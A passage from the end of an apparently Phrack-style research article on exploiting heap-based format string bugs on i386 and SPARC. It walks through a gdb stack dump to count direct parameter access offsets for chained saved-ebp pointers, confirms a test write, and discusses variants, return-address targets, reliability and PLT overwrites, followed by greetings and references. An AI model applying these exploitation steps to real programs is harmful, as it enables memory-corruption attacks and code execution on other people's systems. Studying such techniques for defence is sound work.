0xdfbfdd68:     0x00002000     [0x00000000]<-+  0x00000001      0xdfbfddd4
0xdfbfdd78:     0x00000000      0xdfbfddeb      0xdfbfde04      0xdfbfde0f
0xdfbfdd88:     0xdfbfde50      0xdfbfde66      0xdfbfde7e      0xdfbfde9e

  Ok, time to start getting the right values. First, 0x1968 (from previous
'bt' command) is where do_printf() will return after finishing, locate it
in the stack (in this example it's at 0xdfbfdd14). The previous word is
where Frame A starts, and is where Frame A's ebp is saved, here it's
0xdfbfdd30.
  Great! now we need the direct parameter access number for it, so, as we
executed up to the call, the first word in the stack is the first argument
for printf(), numbered 0. If you count, starting from 0, up to Frame A's
ebp, you'll count 6 words, that's the number we want.
  Now, locate where Frame A's ebp is pointing to, that's Frame B's ebp,
here 0xdfbfdd6c. Count again, you'll get 14, 2nd value needed. Cool, now
Frame B's saved ebp is ponting to Frame C's ebp, so, we already have
another value: 0xdfbfdd6c. And to get the last number needed, you need to
count again, until you get to Frame C's ebp (count until you get to the
address 0xdfbfdd6c), you should get 29.

  Now edit your fs.c, compile it, gdb it, and run past the call (one more
'ni'), you should see a lot of zeros and then:

(gdb) x/x 0xdfbfddf0
0xdfbfddf0:     0xaabbccdd

  Apparently it does work after all :-)

  There are some interesting variants. In this example, printf() is not
called from main(), but from do_printf(). This is an artifact so we had 3
frames to play with. If the printf() is directly in main(), you will not
have three frames, but you could do just the same using argv and *argv, as
the only real things you need are a pointer in the stack, pointing to
another pointer in the stack pointing somewhere in the stack.

  Another interesting method (probably even more interesting than the
original), is to target not a function pointer but a return address in
stack.  This method will be a lot shorter (just 2 %hn per short to write,
and only 2 frames needed), a lot of addresses could be bruteforced at the
same time, and of course, you could use a jumpcode if you want.

  This time We'll leave the experimentation with this two variantes (and
others) to the reader.

  It is noteworthy, that with this technique in i386, Frame B breaks the
chain of the stack frames, so if the program you're exploiting needs to use
Frame C, it's probably that it will segfault, hence you'll need to hook the
execution flow before the crash.

--[ 10. conclusions

--[ 10.1. is it dangerous to overwrite the l0 (on the stack frame) ?

  This is not perfect, but practice shows that you will not have many
problems in changing the value of l0. But, would you be unlucky, you may
prefer to modify the l0's that belongs to main()'s and _start()'s stack
frames.

--[ 10.2. is it dangerous to overwrite the ebp (on the stack frame) ?

  Yes, it's very dangerous. Probably your program will crash. But as we
saw, you can restore the original ebp value using the pointer generator :-)
And as in the SPARC case, you may prefer to modify the ebp's that belongs
to the main(), _start(), etc, stack frames.


--[ 10.3. is this reliable ?

  If you know the state of the stack, or if you know the sizes of the stack
frames, it is reliable. Otherwise, unless the situation lets you implement
some smooth way of bruteforcing all the numbers needed, this technique
won't help you much.

  I think when you have to overwrite values that are located in addresses
that have zeros, this may be your only hope, since, you won't be able to
put a zero in your format string (because it will truncate your string).

  Also in SPARC, the binaries' PLT are located in low addresses and it is
more reliable to overwrite the binary's PLT than the libc's PLT. Why is
this so? Because, I would guess, in Solaris libc changes more frequently
than the binary that you want to exploit. And probably, the binary you want
to exploit will never change! 

--[ The End
--[ 11. more greets and thanks

  gera:

    riq, for trying every stupid idea I have and making it real!

    juliano, for being our format strings guru.

    Impact, for forcing me to spend time thinking about all theese amazing
    things.

    last minute addition: I just learned of the existence of a library
    called fmtgen, Copyrighted by fish stiqz. It's a format string
    construction library, and it can be used (as suggested in its Readme),
    to write jumpcodes or even shellcodes as well as addresses. This are
    the last lines I'm adding to the article, I wish I had a little more
    time, to study it, but we are in a hurry, you know :-)
  riq:

    gera, for finding out how to exploit the heap based format strings in
    i386, for his ideas, suggestions and fixes.

    juliano, for letting me know that I can overwrite, as may times as I
    want an address using 'direct access', and other tips about format
    strings.

    javier, for helping me in SPARC.

    bombi, for trying her best to correct my English.

    and bruce, for correcting my English, too.

--[ 12. references

[1] Exploiting Format String Vulnerability, scut's. 
    March 2001. http://www.team-teso.net/articles/formatstring

[2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.
    January 1999. http://www.w00w00.org/articles.html

[3] Juliano's badc0ded
    http://community.corest.com/~juliano

[4] Google the oracle.
    http://www.google.com

|=[ EOF ]=---------------------------------------------------------------=|